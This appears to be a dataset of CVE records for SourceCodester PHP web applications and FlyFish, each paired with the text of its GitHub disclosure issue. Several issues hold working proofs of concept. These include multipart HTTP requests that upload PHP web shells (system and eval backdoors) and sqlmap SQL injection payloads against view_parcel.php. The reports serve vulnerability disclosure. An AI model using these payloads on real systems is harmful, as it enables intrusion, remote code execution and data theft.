Content-Disposition: form-data; name="item"
saree
------WebKitFormBoundaryu9aV2G3ROxdMpbiR
Content-Disposition: form-data; name="code"
1
------WebKitFormBoundaryu9aV2G3ROxdMpbiR
Content-Disposition: form-data; name="profilepic"; filename="rce.php"
Content-Type: image/jpeg
<?php system("ipconfig"); ?>
------WebKitFormBoundaryu9aV2G3ROxdMpbiR
Content-Disposition: form-data; name="signup"
Add Product
------WebKitFormBoundaryu9aV2G3ROxdMpbiR--
```
## Burp screenshot
+ 
## Uploading file name changes, it is speculated that it is a timestamp renaming mechanism
+ 
+ 
## I successfully executed the PHP script on the terminal
+  | Codezips E-commerce Site Using PHP With Source Code 1.0 admin/addproduct.php Unrestricted Upload | https://api.github.com/repos/ppp-src/CVE/issues/1/comments | 0 | 2024-05-14T11:37:04Z | 2024-05-14T11:37:04Z | https://github.com/ppp-src/CVE/issues/1 | 2,295,192,061 | 1 | 6,022 |
CVE-2024-4945 | 2024-05-16T05:15:52.187 | A vulnerability was found in SourceCodester Best Courier Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file view_parcel.php. The manipulation of the argument id leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264480. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/28"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.264480"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.264480"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.333960"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/28"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.264480"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.264480"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.333960"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mayurik:best_courier_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6D0B90AE-6DFA-40B1-A97C-B445F29F3EB3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/CveSecLook/cve/issues/28 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"CveSecLook",
"cve"
] | # SourceCodester Best courier management system project in php view_parcel.php V1.0 SQL injection vulnerability
# NAME OF AFFECTED PRODUCT(S)
+ Best courier management system project in php
## Vendor Homepage
+ https://www.sourcecodester.com/php/16848/best-courier-management-system-project-php.html#google_vignette
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ zebra11
## Vulnerable File
+ view_parcel.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/mayuri_k/gaatitrack%20by%20mayurik.com_.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ The PHP method uses methods located in view_parcel The $_Variable element on line 5 of the PHP file receives and dynamically executes user controlled code. This allows attackers to cause SQL injection attacks.
+ 
## Impact
+ Attackers can exploit this vulnerability to gain database privileges, which can result in a large amount of data in the database. If the other party's database has DBA privileges, it may lead to server host privileges being obtained.
# DESCRIPTION
+ zebra11 has discovered that due to insufficient protection of the "id" parameter in the "\view_parcel.php" file, "Best courier management system project in php" there is a serious security vulnerability in the This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.
## Payload
+ id=-2335 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x5459775a625a654e4d6a50435668707175737a566d67536c575843784c6465767a414745614a4762,0x7176767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
```
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9437=9437
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 OR (SELECT 9560 FROM(SELECT COUNT(*),CONCAT(0x7178786271,(SELECT (ELT(9560=9560,1))),0x7176767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 2546 FROM (SELECT(SLEEP(5)))smmA)
Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: id=-2335 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x5459775a625a654e4d6a50435668707175737a566d67536c575843784c6465767a414745614a4762,0x7176767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
```
+ This is showing the payload implemented by running sqlmap
+ 
+ The following is the database name displayed as a successful implementation of the attack by running sqlmap
+  | SourceCodester Best courier management system project in php view_parcel.php V1.0 SQL injection vulnerability | https://api.github.com/repos/CveSecLook/cve/issues/28/comments | 0 | 2024-05-14T14:55:17Z | 2024-05-15T02:18:44Z | https://github.com/CveSecLook/cve/issues/28 | 2,295,712,099 | 28 | 6,023 |
CVE-2024-4946 | 2024-05-16T06:15:13.547 | A vulnerability was found in SourceCodester Online Art Gallery Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file admin/adminHome.php. The manipulation of the argument sliderpic leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264481 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/29"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.264481"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.264481"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.334215"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/29"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.264481"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.264481"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.334215"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:donbermoy:online_art_gallery_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DB5104A2-50A5-41E1-8D7F-812A138D0D06",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/CveSecLook/cve/issues/29 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"CveSecLook",
"cve"
] | # SourceCodester Online Art Gallery Management System Project using PHP/MySQL 1.0 admin/adminHome.php Unrestricted Upload
# NAME OF AFFECTED PRODUCT(S)
+ Online Art Gallery Management System Project using PHP/MySQL
## Vendor Homepage
+ https://www.sourcecodester.com/php/14211/online-art-gallery-management-system-project-using-phpmysql.html
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ zebra11
## Vulnerable File
+ admin/adminHome.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlineartgallery.zip
# PROBLEM TYPE
## Vulnerability Type
+ File upload
## Root Cause
+ The input obtained from line 37 of the "admin/adminHome.php" file is used in line 39 of the "admin/adminHome.php" file to determine the location of the file to be written, which may allow attackers to change or damage the content of the file, or create a brand new file.
+ 
## Impact
+ Attackers can exploit this vulnerability for unrestricted uploads, and remote attacks may result in RCE.
# DESCRIPTION
+ zebra11 found that the file upload operation was triggered in admin/adminHome.php, and the _FAILES variable was used to receive the payload. After receiving the attack vector from a remote attacker, it will result in unrestricted uploads, and remote attacks may lead to RCE.
# Vulnerability details and POC
## Payload
+ The picture I uploaded here is a photo of carrying a Trojan horse, but due to character confusion, I took a screenshot directly.
+ 
```
POST /admin/adminHome.php HTTP/1.1
Host: 192.168.31.212:8112
Content-Length: 411
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.31.212:8112
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeU9BPA4FgayRwx5r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.31.212:8112/admin/adminHome.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4tbj4irii9kpe3h2lri2354256
Connection: close
------WebKitFormBoundaryeU9BPA4FgayRwx5r
Content-Disposition: form-data; name="img_id"
------WebKitFormBoundaryeU9BPA4FgayRwx5r
Content-Disposition: form-data; name="sliderpic"; filename="rce.php"
Content-Type: image/jpeg
<?php system("ipconfig"); ?>
------WebKitFormBoundaryeU9BPA4FgayRwx5r
Content-Disposition: form-data; name="sliderPicSubmit"
------WebKitFormBoundaryeU9BPA4FgayRwx5r--
```
## Burp screenshot
+ 
## Upload file name change, rule is to add a "Slider" before the original name
+ 
## I successfully executed the PHP script on the terminal
+  | SourceCodester Online Art Gallery Management System Project using PHP/MySQL 1.0 admin/adminHome.php Unrestricted Upload | https://api.github.com/repos/CveSecLook/cve/issues/29/comments | 0 | 2024-05-14T15:41:58Z | 2024-05-14T15:41:59Z | https://github.com/CveSecLook/cve/issues/29 | 2,295,816,357 | 29 | 6,024 |
CVE-2024-4966 | 2024-05-16T08:15:39.317 | A vulnerability was found in SourceCodester SchoolWebTech 1.0. It has been classified as critical. Affected is an unknown function of the file /improve/home.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-264534 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/30"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.264534"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.264534"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.334216"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/30"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.264534"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.264534"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.334216"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sinamjackson:schoolwebtech:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DA9F74E9-7B76-4ABC-8E25-9525AC85DB93",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/CveSecLook/cve/issues/30 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"CveSecLook",
"cve"
] | # SourceCodester SchoolWebTech 1.0 /improve/home.php Unrestricted Upload
# NAME OF AFFECTED PRODUCT(S)
+ SchoolWebTech
## Vendor Homepage
+ https://www.sourcecodester.com/php/6638/school-web-tech.html
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ zebra11
## Vulnerable File
+ /improve/home.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/Bigs%20Jackson%20Sinam/newschool.zip
# PROBLEM TYPE
## Vulnerability Type
+ File upload
## Root Cause
+ The input obtained through PHP in line 375 of the \ improve \ home.php file is used by PHP in line 375 to determine the location of the file to be written, which may allow attackers to modify or damage the content of the file, or create a brand new file.
+ 
## Impact
+ Attackers can exploit this vulnerability for unrestricted uploads, and remote attacks may result in RCE.
# DESCRIPTION
+ zebra11 found that the file upload operation was triggered in /improve/home.php, and the _FAILE variable was used to receive the payload. After receiving the attack vector from a remote attacker, it will result in unrestricted uploads, and remote attacks may lead to RCE.
# Vulnerability details and POC
## Payload
+ This attack payload can be used without the need for login.
+ 
```
POST /improve/home.php?action=upload HTTP/1.1
Host: www.newschool.com:8126
Content-Length: 401
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.newschool.com:8126
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPfsdD8ejAA2Ivepk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://www.newschool.com:8126/improve/home.php?action=upload
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryPfsdD8ejAA2Ivepk
Content-Disposition: form-data; name="owner"
------WebKitFormBoundaryPfsdD8ejAA2Ivepk
Content-Disposition: form-data; name="image"; filename="rce.php"
Content-Type: image/jpeg
<?php eval($_POST[cc123]) ?>
------WebKitFormBoundaryPfsdD8ejAA2Ivepk
Content-Disposition: form-data; name="submit"
Upload
------WebKitFormBoundaryPfsdD8ejAA2Ivepk--
```
+ Successfully connected using the tool and executed the ipconfig command
+ 
| SourceCodester SchoolWebTech 1.0 /improve/home.php Unrestricted Upload | https://api.github.com/repos/CveSecLook/cve/issues/30/comments | 0 | 2024-05-14T15:45:21Z | 2024-05-14T15:45:21Z | https://github.com/CveSecLook/cve/issues/30 | 2,295,823,794 | 30 | 6,025 |
CVE-2024-34905 | 2024-05-16T15:15:47.887 | FlyFish v3.0.0 was discovered to contain a buffer overflow via the password parameter on the login page. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CloudWise-OpenSource/FlyFish/issues/191"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CloudWise-OpenSource/FlyFish/issues/191"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cloudwise:flyfish:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "46E15E56-7CF6-466D-83E9-E41842D6780E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/CloudWise-OpenSource/FlyFish/issues/191 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"CloudWise-OpenSource",
"FlyFish"
] | **1. testing environment**
The testing environment is VMware Workstation: Seed Ubuntu 20.04
**The version is as follows:**

**2. The vulnerability involves program code location and version number**
**Vulnerability code location:**
./fly-fish-master/dataplatform/flyfishServer/src/main/java/.../lcap/controller/BaseUserController.Java
**Test version:** Flyfish open source version
**3. Detailed report**
When capturing program login, registration, and other password design operations, we found that the client directly transmitted sensitive information such as usernames and passwords in plaintext, and operated on these information without restrictions. In the file ./fly-fish-master/dataplatform/flyfishServer/src/main/java/.../lcap/controller/BaseUserController.java includes functions for login, registration, and password modification.


